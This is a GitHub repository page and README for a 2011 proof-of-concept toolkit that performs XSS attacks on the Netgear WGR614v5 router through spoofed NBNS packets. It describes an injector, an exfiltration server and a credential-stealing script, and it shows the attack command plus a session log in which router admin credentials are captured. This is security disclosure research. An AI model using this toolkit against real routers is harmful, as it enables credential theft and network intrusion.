GitHub - simon-weber/XSS-over-NBNS: Proof of concept toolkit for demonstrating xss attacks against the Netgear WGR614v5.

simon-weber / XSS-over-NBNS Public

Notifications You must be signed in to change notification settings
Fork 0
Star 10

Proof of concept toolkit for demonstrating xss attacks against the Netgear WGR614v5.

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
exploit_js		exploit_js
LICENSE		LICENSE
README		README
driver.py		driver.py
nbns_injector.py		nbns_injector.py
nbns_server.py		nbns_server.py
phrack_paper		phrack_paper

Repository files navigation

XSS Using NBNS on the WGR614v5: Proof of Concept Code
Simon Weber
October 2011

Files:
README
LICENSE:
Code uses the GPLv2 license (because Scapy does).

driver.py

nbns_injector:
Listens for, creates and sends the spoofed NBNS
packets.

nbns_server:
A simple http server to host exploits and receive
data from them.

exploit_js/steal_admin.js:
Built-in exploit for stealing admin
credentials.

exploit_js/hide_rows.js:
Built-in exploit for hiding rows of the
attached devices listing.

Usage:
You probably want to use driver.py. Running with no arguments
gets you the option list. The easiest way to run is to use the
built-in server with the -s flag. Here's an example of a
successful admin credential stealing session with the built-in
server:

$ python driver.py -r 192.168.1.1 -a 192.168.1.3 -i eth1 -f 192.168.1.111 -t 1 -s

WARNING: no route found for IPv6 destination :: (no default route?)
Server starting: [done]
Injector started.
Ready to inject.
192.168.1.2 - - [14/Oct/2011 14:30:07] "GET /exploit_js/steal_admin.js HTTP/1.1" 200 -
{'super_passwd': 'Geardog', 'http_passwd': 'password', 'super_username': 'Gearguy', 'http_username': 'admin'}
^C
Injector stopped.
Server stopping: [done]

Once you run, you'll first see the init messages about the
various components starting. Next, it will wait to sniff one
request from the router. Once this request is used to precompute
later responses, you'll see "Ready to inject". The next time a
request is seen, the spoofed packets are sent, and the exploit
is run. In this example, we see the server logging that the
external exploit code was read. The next line is the server
parsing out admin credentials from the POSTed configuration
file.

The injector and server can both stand alone, if anyone has
any other use for them. Feel free to contact me if you have
questions when using my code.

Note that if hosting the built-in exploit javascript elsewhere
(with -h), driver.py expects them to be located at
/exploit_js/<file>.

Code was tested on Python 2.6.5 and Scapy 2.1.0.